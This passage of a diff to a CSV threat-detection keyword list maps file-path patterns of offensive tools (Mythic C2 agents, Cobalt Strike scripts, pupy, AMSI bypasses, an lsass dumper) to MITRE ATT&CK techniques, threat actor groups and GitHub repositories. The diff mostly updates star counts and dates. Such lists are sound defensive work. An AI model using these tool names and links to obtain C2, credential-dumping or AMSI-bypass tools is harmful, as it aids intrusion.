- TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/merlin.*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*/agent_code/powershell_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/agent_code/sh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/agent_code/zsh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/agent_functions/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/agent_icons/athena.svg*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AggressiveClean.cna*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*/aggressor/*.java*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/agent_functions/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/agent_icons/athena.svg*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AggressiveClean.cna*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/aggressor/*.java*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/aggressor-powerview*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" "*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/agscript *","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/agscript *","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/agscript *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ahmedkhlief/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ahrixia/CVE_2022_0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" @@ -2650,21 +2653,21 @@ "*/Alcatraz/files/*/Alcatraz.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz/x64*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz-gui*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"*/all/pupyutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/all/pupyutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amass/wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/amsi.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/amsi.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/Amsi_Bypass_In_2023*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*/AMSI_patch.git*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*/Amsi-Killer.git*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*/AmsiOpenSession.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" -"*/Analyzer-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Analyzer-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/AndrewSpecial.git*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" -"*/android/pupydroid/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/android/pupydroid/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/ANGRYPUPPY.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 